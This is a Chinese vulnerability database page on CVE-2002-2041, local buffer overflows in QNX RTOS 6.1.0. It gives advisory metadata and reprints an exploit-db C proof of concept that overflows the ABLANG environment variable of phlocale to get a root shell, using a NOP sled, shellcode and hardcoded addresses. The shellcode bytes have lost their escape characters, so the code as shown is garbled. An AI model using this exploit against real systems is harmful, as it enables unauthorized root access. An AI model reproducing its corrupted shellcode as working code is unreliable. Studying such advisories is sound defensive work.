QNX RTOS PKG-Installer缓冲区溢出漏洞

QNX RTOS PKG-Installer缓冲区溢出漏洞

漏洞ID 1106764 漏洞类型 缓冲区溢出
发布时间 2002-06-03 更新时间 2005-10-20
图片[1]-QNX RTOS PKG-Installer缓冲区溢出漏洞-安全小百科CVE编号 CVE-2002-2041
图片[2]-QNX RTOS PKG-Installer缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200212-738
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/21505
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-738
|漏洞详情
realtimeoperatingsystem(RTOS)6.1.0版本存在多个缓冲区溢出漏洞。本地用户可以通过(1)超长phlocale中的ABLANG环境变量或(2)超长pkg-installer的-u选项执行任意代码。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/4917/info

The QNX phlocale utility is prone to an exploitable buffer overflow condition. This is due to insufficient bounds checking of the ABLANG environment variable. Exploitation of this issue may result in execution of arbitrary attacker-supplied instructions as root. 
*/

/* QNX phlocale $ABLANG exploit, gives you a cute euid=0 shell. 
 * If it doesnt work for you, then you most likely need to change
 * the address to system() and/or the ret.
 * 
 * www.badc0ded.com 
*/

main ()
{ 
   char s[]="xebx0ex31xc0x5b"
            "x88x43x2x53xbb"
            "x80x95x04x08"       //system() address
            "xffxd3xe8xedxff"
            "xffxffx73x68";
   char payload[1000];
   memset (payload,0x90,sizeof(payload));
   sprintf(payload+971,"%s%s",s,"x78x7bx04x08");
   setenv("ABLANG",payload);
   execlp("/usr/photon/bin/phlocale","phlocale",0);
}
|参考资料
http://www.securityfocus.com/bid/4918※http://online.securityfocus.com/bid/4918※http://www.iss.net/security_center/static/9258.php※http://www.iss.net/security_center/static/9259.php※http://www.securityfocus.com/bid/4917※http://www.securityfocus.com/data/vulnerabilities/exploits/phlocale.c※

相关推荐: Novell BorderManager URL Rule Restriction Bypass Vulnerability

Novell BorderManager URL Rule Restriction Bypass Vulnerability 漏洞ID 1103946 漏洞类型 Access Validation Error 发布时间 2000-07-05 更新时间 2000…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享